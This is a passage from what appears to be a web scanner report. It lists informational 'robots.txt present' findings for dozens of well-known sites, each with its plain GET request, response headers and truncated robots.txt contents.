Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.hotels.com

Response

HTTP/1.0 200 OK
Server: Apache
X-hcom-ctx: en_US|HCOM_US
Content-Language: en-US
Last-Modified: Tue, 15 Mar 2011 00:00:00 GMT
Cteonnt-Length: 5472
Expect:
Content-Type: text/plain;charset=ISO-8859-1
Cache-Control: private, max-age=0
Expires: Sat, 02 Apr 2011 13:38:59 GMT
Date: Sat, 02 Apr 2011 13:38:59 GMT
Content-Length: 5472
Connection: close


User-agent: Mediapartners-Google*
Disallow: *.pdf$
Disallow: /SeoSearchMap*
Disallow: /hotel/email_details.html*
Disallow: /search*
Disallow: /fullEnglishDesc.do*
Disallow: /checkavailability.do
Disa
...[SNIP]...
24.406. http://www.hotfrog.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hotfrog.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.hotfrog.com

Response

HTTP/1.1 200 OK
Cache-Control: max-age=604800
Content-Length: 26
Content-Type: text/plain
Last-Modified: Tue, 01 Feb 2011 01:19:08 GMT
Accept-Ranges: bytes
ETag: "04ea6aec1cb1:40539"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sat, 02 Apr 2011 13:38:45 GMT
Connection: close

User-agent: *
Disallow:
24.407. http://www.hotwire.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hotwire.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.hotwire.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Accept-Ranges: bytes
ETag: W/"716-1300925725000"
Last-Modified: Thu, 24 Mar 2011 00:15:25 GMT
Content-Type: text/plain
Content-Length: 716
Date: Sat, 02 Apr 2011 13:37:51 GMT
Connection: keep-alive
Set-Cookie: NSC_qspe-xxx-qfstjtu=ffffffffaf131c2545525d5f4f58455e445a4a422d6b;path=/;httponly

#Sitemap Pointer
Sitemap: http://www.hotwire.com/sitemap.xml

#Allow all robots to crawl based on following directives
User-Agent: *

#Disallow any URL with query string parameters
Disallow: /*?

#Dis
...[SNIP]...
24.408. http://www.house.gov/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.house.gov
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.house.gov

Response

HTTP/1.0 200 OK
Server: USHR Webserver Ver 5.4.1
Content-Type: text/plain
Last-Modified: Fri, 18 May 2001 17:31:43 GMT
Content-Length: 349
ETag: "15d-3b055c7f"
Accept-Ranges: bytes
Date: Sat, 02 Apr 2011 13:34:41 GMT
Connection: close

#
# No robots allowed in the following directories !
#
User-agent: *
Disallow: /htbin
Disallow: /docs/ARCHIVE
Disallow: /docs/apps
Disallow: /docs/moved_sites
Disallow: /docs/temp
Disallow: /docs/te
...[SNIP]...
24.409. http://www.howstuffworks.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.howstuffworks.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.howstuffworks.com

Response

HTTP/1.0 200 OK
Server: ATS/2.1.6-unstable
Last-Modified: Sat, 02 Apr 2011 13:00:02 GMT
P3P: CP="ALL DSP COR CUR ADMo DEVo TAIo PSAo PSDo IVAo CONi OTPi OUR NOR UNI"
_ontent-Length: 876
Content-Type: text/plain; charset=UTF-8
Date: Sat, 02 Apr 2011 13:23:54 GMT
Content-Length: 876
Connection: close
Set-Cookie: target=us; path=/; domain=.howstuffworks.com
Expires: Sat, 02 Apr 2011 14:00:00 GMT

User-agent: *
Disallow: /search.php
Disallow: /search2.php
Disallow: /suggest-vote.php
Disallow: /suggest-moreinfo.htm
Disallow: /suggest-comment.htm
Disallow: /suggest-vote.php
Disallow: /sugg
...[SNIP]...
24.410. http://www.howtodothings.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.howtodothings.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.howtodothings.com

Response

HTTP/1.1 200 OK
Server: nginx
Content-Type: text/plain
Last-Modified: Fri, 04 Feb 2011 14:46:59 GMT
Cache-Control: max-age=1209600
Expires: Wed, 13 Apr 2011 19:58:53 GMT
Vary: Accept-Encoding
X-AH-Environment: prod
Content-Length: 1885
Date: Sat, 02 Apr 2011 13:45:46 GMT
X-Varnish: 199372703 196147193
Age: 236813
Via: 1.1 varnish
Connection: close
X-Cache: HIT
X-Cache-Hits: 865

# $Id: robots.txt,v 1.9.2.1 2008/12/10 20:12:19 goba Exp $
#
# robots.txt
#
# This file is to prevent the crawling and indexing of certain parts
# of your site by web crawlers and spiders run by sites
...[SNIP]...
24.411. http://www.hp.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hp.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.hp.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 12:43:36 GMT
Server: Apache
Last-Modified: Tue, 15 Feb 2011 23:06:37 GMT
ETag: "3761f940"
Accept-Ranges: bytes
Content-Length: 454
Cache-Control: max-age=7200
Expires: Sat, 02 Apr 2011 14:43:36 GMT
Connection: close
Content-Type: text/plain

#$Header: robots.txt,v 1.19 2009/10/19 16:47:17 autreja Exp $ $Locker: $

# robots.txt file for www.hp.com
# send e-mail to hp<dot>comOperations<at>hp<dot>com for updates or problems

User-agent
...[SNIP]...
24.412. http://www.hsbccreditcard.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hsbccreditcard.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.hsbccreditcard.com

Response

HTTP/1.1 200 OK
Server: ""
Date: Sat, 02 Apr 2011 13:36:22 GMT
Content-length: 16427
Content-type: text/plain
Set-Cookie: WEBTRENDS_ID=173.193.214.243-1301751382.141234; path=/; expires=Tue, 30-Mar-2021 13:36:22 GMT
P3p: CP="CAO COR ADM DEVa TAIa PSA PSD IVAa IVDa CONa HIS OUR LEG CNT"
Expires: Sat, 02 Apr 2011 14:06:22 GMT
Last-modified: Fri, 19 Feb 2010 11:33:44 GMT
Surrogate-control: no-store
Content-language: en
Set-cookie: LASCCSSA2001US_ID=0000s5nFkorH5fueJ-9EtNPQdN2:15nj8arcb; Path=/
Cache-control: no-cache="set-cookie, set-cookie2"
Connection: close

# mapping for web robots
# Added Allow, disallows & Sitemap directives as per SEO requirements for Aug 09 release.
User-agent: *
# ----------------------Allows Start -------------------------------
...[SNIP]...
24.413. http://www.hsn.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hsn.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.hsn.com

Response

HTTP/1.1 200 OK
Content-Length: 462
Content-Type: text/plain
Last-Modified: Wed, 23 Mar 2011 15:23:10 GMT
Accept-Ranges: bytes
ETag: "0c3ad376ee9cb1:e66"
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR LAW CURa ADMa DEVa PSAa PSDa OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
X-Powered-By: ASP.NET
Set-Cookie: TLTSID=A12047614762F0DB751F22BA5526B7C8; domain=.hsn.com; path=/
Set-Cookie: TLTHID=A12047614762F0DB751F22BA5526B7C8; domain=.hsn.com; path=/
Date: Sat, 02 Apr 2011 13:35:57 GMT
Connection: close

#Disallow all web-bots from searching the site
User-agent: *
Disallow: /cmr/
Disallow: /cnt/prod/moreinfo/
Disallow: /code/
Disallow: /css/
Disallow: /cust/
Disallow: /error/
Disallow: /Fc/
D
...[SNIP]...
24.414. http://www.hud.gov/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hud.gov
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.hud.gov

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Sat, 02 Apr 2011 13:53:57 GMT
Content-length: 1593
Content-type: text/plain
Last-modified: Mon, 10 Nov 2008 17:06:36 GMT
Accept-ranges: bytes
Connection: close

User-agent: *
Disallow: /_notes/
Disallow: /apps/
Disallow: /bandwidth/
Disallow: /CFIDE/
Disallow: /cfmail/
Disallow: /cwg/
Disallow: /emergency/
Disallow: /emarc/
Disallow: /event_registrat
...[SNIP]...
24.415. http://www.huffingtonpost.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.huffingtonpost.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.huffingtonpost.com

Response

HTTP/1.0 200 OK
Server: Apache/2.2.8 (Unix)
Last-Modified: Fri, 21 May 2010 12:59:43 GMT
ETag: "610acec-b5-4871a43c92dc0"
Content-Type: text/plain; charset=utf-8
Date: Sat, 02 Apr 2011 12:37:46 GMT
Content-Length: 181
Connection: close

# All robots will spider the domain
User-agent: *
Disallow:

User-agent: *
Disallow: /backstage/

User-agent: *
Disallow: /blackberry/

User-agent: *
Disallow: /users/becomeFan.php
24.416. http://www.hulu.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hulu.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.hulu.com

Response

HTTP/1.0 200 OK
Server: nginx
Content-Type: text/plain
Last-Modified: Thu, 10 Mar 2011 07:12:48 GMT
Date: Sat, 02 Apr 2011 12:37:51 GMT
Content-Length: 1194
Connection: close

User-agent: blinkx
Disallow: /

User-agent: blinkx_ff_spider
Disallow: /

User-agent: *
Disallow: /account/authenticate
Disallow: /activities/
Disallow: /channels/
Disallow: /discussions/search
Disall
...[SNIP]...
24.417. http://www.ichotelsgroup.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ichotelsgroup.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.ichotelsgroup.com

Response

HTTP/1.0 200 OK
Server: Apache/1.3.41 (Unix) Communique/4.0.4 mod_ssl/2.8.31 OpenSSL/0.9.8a
Content-Type: text/plain; charset=utf-8
P3P: CP="OTI DSP COR DEVa OUR NOR",policyref="http://dcs.ichotelsgroup.com/w3c/p3p.xml"
Last-Modified: Wed, 23 Feb 2011 01:21:38 GMT
ETag: "fa7b-ec4-4d646122"
Accept-Ranges: bytes
Content-Length: 3780
Expires: Sat, 02 Apr 2011 13:37:25 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 02 Apr 2011 13:37:25 GMT
Connection: close
Set-Cookie: TLTSID=588F60E05D2E105D0001ED27673734ED; Path=/; Domain=.ichotelsgroup.com
Set-Cookie: TLTUID=588F60E05D2E105D0001ED27673734ED; Path=/; Domain=.ichotelsgroup.com; expires=Sat, 02-04-2021 13:37:25 GMT

User-agent: OmniExplorer_Bot
Disallow: /

User-agent: NaverBot-1.0
Disallow: /

User-agent: NaverBot
Disallow: /

User-agent: Mizzu Labs 2.2
Disallow: /

User-agent: *
Disallow: /css/
Disallow: /journ
...[SNIP]...
24.418. http://www.icontact.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.icontact.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.icontact.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 14:00:52 GMT
Server: Apache/2.2.9 (Debian) PHP/5.2.12-0.dotdeb.1 with Suhosin-Patch mod_ssl/2.2.9 OpenSSL/0.9.8g
Last-Modified: Wed, 02 Mar 2011 22:20:18 GMT
ETag: "199-49d87515c6c80"
Accept-Ranges: bytes
Content-Length: 409
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain

# File to control which pages friendly web spiders index.

# This file applies to all spiders
User-agent: *
Disallow: /lp/
Disallow: /001/
Disallow: /010/
Disallow: /012/
Disallow: /a.pl
Disallow: /re
...[SNIP]...
24.419. http://www.identityguard.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.identityguard.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.identityguard.com

Response

HTTP/1.1 200 OK
Content-Length: 3573
Content-Type: text/plain
Last-Modified: Thu, 17 Feb 2011 15:55:23 GMT
Accept-Ranges: bytes
ETag: "f6711a16bbcecb1:1fff"
X-Powered-By: ASP.NET
Date: Sat, 02 Apr 2011 13:27:04 GMT
Connection: close

...# robots.txt file for http://www.identityguard.com
User-agent: *
Disallow: /App_Code/
Disallow: /aspnet_client/
Disallow: /AssetManagement/
Disallow: /assets/
Disallow: /bin/
Disallow: /css/
...[SNIP]...
24.420. http://www.ikea.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ikea.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.ikea.com

Response

HTTP/1.0 200 OK
Server: IBM_HTTP_Server
Last-Modified: Wed, 17 Nov 2010 07:30:29 GMT
ETag: "802-199-a5ca8f40"
Accept-Ranges: bytes
Content-Length: 409
Content-Type: text/plain; charset=utf-8
Cache-Control: public, max-age=1800
Date: Sat, 02 Apr 2011 13:41:59 GMT
Connection: close

User-agent: *
Disallow: /ms/en_SE/
Disallow: /webapp/wcs/stores/servlet/IkeamsSearch
Disallow: /be/fr/preindex.html
Disallow: /be/nl/preindex.html
Disallow: /webapp/wcs/stores/servlet/InterestIt
...[SNIP]...
24.421. http://www.ilike.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ilike.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.ilike.com

Response

HTTP/1.1 200 OK
Content-Type: text/plain
P3P: policyref="http://www.ilike.com/p3p.xml", CP="CAO CUR ADM IVAo IVDo CONo OTPo OUR IND UNI NAV ONL INT PRE"
Date: Sat, 02 Apr 2011 12:28:26 GMT
X-App: lv-app82-170:80
Last-Modified: Mon, 03 Jan 2011 23:38:17 GMT
Content-Length: 135
Connection: Keep-Alive

# See http://www.robotstxt.org/wc/norobots.html for documentation on how to use the robots.txt file
User-agent: Rapleafbot
Disallow: /
24.422. http://www.iloveindia.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.iloveindia.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.iloveindia.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:56:58 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 PHP/5.2.9
Last-Modified: Tue, 24 Nov 2009 14:42:53 GMT
ETag: "681f81-5c-f4fc5540"
Accept-Ranges: bytes
Content-Length: 92
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /adnetwork/
Disallow: /directory/
Disallow: /hotelsinindia/query/


24.423. http://www.imageshack.us/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.imageshack.us
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.imageshack.us

Response

HTTP/1.1 200 OK
Server: nginx/0.7.64
Date: Sat, 02 Apr 2011 13:31:42 GMT
Content-Type: text/plain
Content-Length: 116
Last-Modified: Tue, 30 Nov 2010 23:31:04 GMT
Connection: close
Set-Cookie: is_uuid=4f536d4396c041c4a079db878dc9e2ea; expires=Thu, 31-Dec-37 23:55:55 GMT; domain=.imageshack.us; path=/
P3P: CP="NOI CUR ADM OUR NOR STA NID"
X-Server-Name-And-Port: _:14000
Accept-Ranges: bytes

User-agent: *
Disallow: /images/tag/
Disallow: /search.php
Sitemap: http://stream.imageshack.us/image_sitemap.xml
24.424. http://www.imdb.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.imdb.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.imdb.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 12:37:57 GMT
Server: Server
Last-Modified: Fri, 01 Apr 2011 05:36:07 GMT
ETag: "1512-4d956447"
Accept-Ranges: bytes
Content-Length: 5394
Cneonction: close
Content-Type: text/plain
Vary: Accept-Encoding,User-Agent
P3P: policyref="http://i.imdb.com/images/p3p.xml",CP="CAO DSP LAW CUR ADM IVAo IVDo CONo OTPo OUR DELi PUBi OTRi BUS PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA HEA PRE LOC GOV OTC "
Connection: close

# robots.txt for IMDb properties
# [ images/legacy/robots.txt ]
#
User-agent: Slurp
Crawl-delay: 0.2
Disallow: /tvschedule
Disallow: /ActorSearch
Disallow: /ActressSearch
Disallow: /AddRecommendation

...[SNIP]...
24.425. http://www.imesh.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.imesh.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.imesh.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Sun, 06 Mar 2011 13:23:25 GMT
ETag: "17-48ae8d40"
Accept-Ranges: bytes
Content-Length: 23
X-ML: W1
Content-Type: text/plain
Date: Sat, 02 Apr 2011 13:33:15 GMT
Connection: close

User-Agent: *
Allow: /
24.426. http://www.in.gov/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.in.gov
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.in.gov

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:39:27 GMT
Server: Apache
Last-Modified: Thu, 17 Feb 2011 22:40:56 GMT
ETag: "ae80d3-d2-49c821736ee00"
Accept-Ranges: bytes
Content-Length: 210
Connection: close
Content-Type: text/plain
Content-Language: en
Set-Cookie: BIGipServerwww.IN.gov-http=1865746442.20480.0000; expires=Sat, 02-Apr-2011 13:40:27 GMT; path=/

# robots.txt for http://www.IN.gov/


User-agent: *

Disallow: /serv/

Disallow: /apps/

Disallow: /cgi-bin/

Disallow: /isdh/drafts_local/

Disallow: /demand

Disallow: /search

Disallow: /
...[SNIP]...
24.427. http://www.inbox.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.inbox.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.inbox.com

Response

HTTP/1.1 200 OK
Content-Length: 431
Content-Type: text/plain
Last-Modified: Thu, 03 Feb 2011 08:11:31 GMT
Accept-Ranges: bytes
ETag: "fee22f779c3cb1:33ef"
Server: Microsoft-IIS/6.0
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
Date: Sat, 02 Apr 2011 13:33:24 GMT
Connection: close

User-Agent: *
Disallow: /_portal/

User-Agent: msnbot
Crawl-delay: 1
Disallow: /xfb_redir.aspx
Disallow: /_portal/

User-Agent: msnbot-newsblogs
Disallow: /xfb_redir.aspx
Disallow: /_portal/
...[SNIP]...
24.428. http://www.inc.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.inc.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.inc.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 14:19:47 GMT
Server: VoxCAST
Last-Modified: Mon, 15 Nov 2010 16:55:00 GMT
ETag: "98f487-33f-4951a4cfa4100"
Accept-Ranges: bytes
Content-Length: 831
Cache-Control: max-age=259200
Expires: Sat, 02 Apr 2011 14:52:46 GMT
Age: 257220
X-Cache: HIT from VoxCAST
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: *
Disallow: /apps
Disallow: /discussions
Disallow: /cgi-bin
Disallow: /search
Disallow: /sendit
Disallow: /soundoff
Disallow: /resources/inc500.5172005
Disallow: /resources/inc500.20050819
...[SNIP]...
24.429. http://www.indeed.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.indeed.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.indeed.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:24:39 GMT
Server: Apache
Last-Modified: Tue, 16 Nov 2010 23:08:23 GMT
ETag: "6f0001-ba2-49533a22447c0"
Accept-Ranges: bytes
Content-Length: 2978
Vary: User-Agent
Keep-Alive: timeout=30, max=30000
Connection: Keep-Alive
Content-Type: text/plain; charset=UTF-8
Set-Cookie: NSC_vt_jbe=ffffffffad2ce1a345525d5f4f58455e445a4a423660;expires=Sat, 02-Apr-2011 14:24:39 GMT;path=/;httponly

User-agent: *
Allow: /
Disallow: /advanced_search?
Disallow: /rss
Disallow: /g/
Disallow: /r/
Disallow: /rc/
Disallow: /pagead/
Disallow: /ads/
Disallow: /rdr/
Disallow: /my/
Disallow: /rpc/
Disallow:
...[SNIP]...
24.430. http://www.indiatimes.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.indiatimes.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.indiatimes.com

Response

HTTP/1.0 200 OK
Content-Length: 68
Content-Type: text/plain
Last-Modified: Mon, 31 Jan 2011 06:25:19 GMT
Accept-Ranges: bytes
ETag: "cddfda1fc1cb1:5cf"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Cache-Control: max-age=128715
Date: Sat, 02 Apr 2011 14:02:49 GMT
Connection: close

User-agent: *
Disallow: /default1.cms
Disallow: /default.cms


24.431. http://www.info.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.info.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.info.com

Response

HTTP/1.1 200 OK
Set-Cookie: Z=YOYLQIS74.205.26.218CKMLM; path=/
Date: Sat, 02 Apr 2011 13:39:24 GMT
Server: Apache
Last-Modified: Mon, 12 May 2008 11:16:27 GMT
ETag: "64fd1b-18-44d06adbf98c0"
Accept-Ranges: bytes
Content-Length: 24
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain; charset=ISO-8859-1

User-agent: *
Disallow:
24.432. http://www.infoplease.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.infoplease.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.infoplease.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:37:24 GMT
Server: Apache
Set-Cookie: Apache=173.193.214.243.1301751444510777; path=/; expires=Sun, 01-Apr-12 13:37:24 GMT
Vary: User-Agent,Accept-Encoding
Connection: close
Cache-Control: max-age=0
Expires: Sat, 02 Apr 2011 13:37:24 GMT
Content-Length: 450
Content-Type: text/plain;charset=iso-8859-1

User-agent: Mediapartners-Google*
Disallow:

User-agent: *
Disallow: /dynaweb/
Disallow: /dw/
Disallow: /oasis/
Disallow: /oasisi-e.php
Disallow: /oasisi-i.php
Disallow: /oasisi-j.php
Disallow: /oasis
...[SNIP]...
24.433. http://www.infowars.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.infowars.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.infowars.com

Response

HTTP/1.0 200 OK
Server: Apache
Accept-Ranges: bytes
Cache-Control: max-age=7200, public
Content-Type: text/plain; charset=UTF-8
Age: 11973
Date: Sat, 02 Apr 2011 13:42:33 GMT
Last-Modified: Mon, 29 Nov 2010 04:13:43 GMT
Expires: Sat, 02 Apr 2011 14:23:00 GMT
Content-Length: 450
Connection: close

User-agent: *
Disallow: /cgi-bin
Disallow: /wp-admin
Disallow: /wp-includes
Disallow: /wp-content
Disallow: /tag
Disallow: /author
Disallow: /wget/
Disallow: /httpd/

User-agent: Mediapartn
...[SNIP]...
24.434. http://www.ingdirect.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ingdirect.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.ingdirect.com

Response

HTTP/1.1 200 OK
Connection: close
Last-Modified: Fri, 04 Mar 2011 13:19:36 GMT
Server: Microsoft-IIS/7.0
Content-Type: text/plain
Date: Sat, 02 Apr 2011 13:43:45 GMT
Content-Length: 607
ETag: "pvd6ef711ae3057fa3a07bf5bd95a791c5"
Expires: Sat, 02 Apr 2011 13:43:55 GMT
Cache-Control: public, s-maxage=0, max-age=10
X-PvInfo: [S10203.C6966.A38321.RA0.G9647.UE1B49C4B].[OT/plaintext.OG/documents]
Accept-Ranges: bytes

User-agent: *
Disallow: *.ico
Disallow: *.inc
Disallow: /bsa_box
Disallow: /bsa_chart
Disallow: /compare-mortgages
Disallow: /eo-high-interest-checking
Disallow: /fakefees
Disallow: /google
D
...[SNIP]...
24.435. http://www.insiderpages.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.insiderpages.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.insiderpages.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 14:08:30 GMT
Server: Apache
Last-Modified: Tue, 15 Mar 2011 02:34:32 GMT
Accept-Ranges: bytes
Content-Length: 706
Cache-Control: max-age=0
Expires: Sat, 02 Apr 2011 14:08:30 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /signup
Disallow: /recs/
Disallow: /signon
Disallow: /signon/forgot_password
Disallow: /signon/change_password
Disallow: /review/write/
Disallow: /review/flag/
Disallow: /revie
...[SNIP]...
24.436. http://www.instructables.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.instructables.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.instructables.com

Response

HTTP/1.1 200 OK
Server: Resin/3.0.28
P3P: IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA
ETag: "89fvrAVqdMX"
Last-Modified: Tue, 22 Feb 2011 23:27:56 GMT
Content-Type: text/plain
Content-Length: 1166
X-Cacheable: YES - 30 minutes
Cache-Control: no-cache
Date: Sat, 02 Apr 2011 13:36:03 GMT
X-Varnish: 793449977 793331233
Age: 1101
Via: 1.1 varnish
X-Cache-Svr: squid04.instructables.com
X-Cache: HIT
X-Cache-Hits: 23
Connection: close

hi from cloude
User-agent: Mediapartners-Google*
Disallow:

User-agent: *
Disallow: /include/
Disallow: /account/
Disallow: /you/
Disallow: /admin/
Disallow: /patch/
Disallow: /pages/
...[SNIP]...
24.437. http://www.intel.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.intel.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.intel.com

Response

HTTP/1.0 200 OK
Content-Length: 481
Content-Type: text/plain
Last-Modified: Mon, 28 Mar 2011 23:31:02 GMT
Accept-Ranges: bytes
ETag: "1ed26633a0edcb1:4476"
Server: IA Web Server
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR STP ONL UNI COM NAV INT DEM STA PRE"
Date: Sat, 02 Apr 2011 14:04:59 GMT
Connection: close

# robots.txt exclusion for www.intel.com
#

# for all agents, keep them out of the /cgi directory

User-agent: *
Disallow: /cgi
Disallow: /iaweb/
Disallow: /cpc/vision/
Disallow: /intel/june2
...[SNIP]...
24.438. http://www.intellicast.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.intellicast.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.intellicast.com

Response

HTTP/1.1 200 OK
Cache-Control: max-age=259200
Content-Length: 1464
Content-Type: text/plain
Last-Modified: Thu, 24 Apr 2008 13:28:09 GMT
Accept-Ranges: bytes
ETag: "42664c9fa6c81:569"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sat, 02 Apr 2011 14:06:22 GMT
Connection: close

...User-agent: *
Sitemap: http://www.intellicast.com/sitemap.xml
Sitemap: http://www.intellicast.com/sitemap_conus_weather.xml
Sitemap: http://www.intellciast.com/sitemap_global_weather.xml
Sitema
...[SNIP]...
24.439. http://www.intuit.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.intuit.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.intuit.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:39:42 GMT
Server: Apache
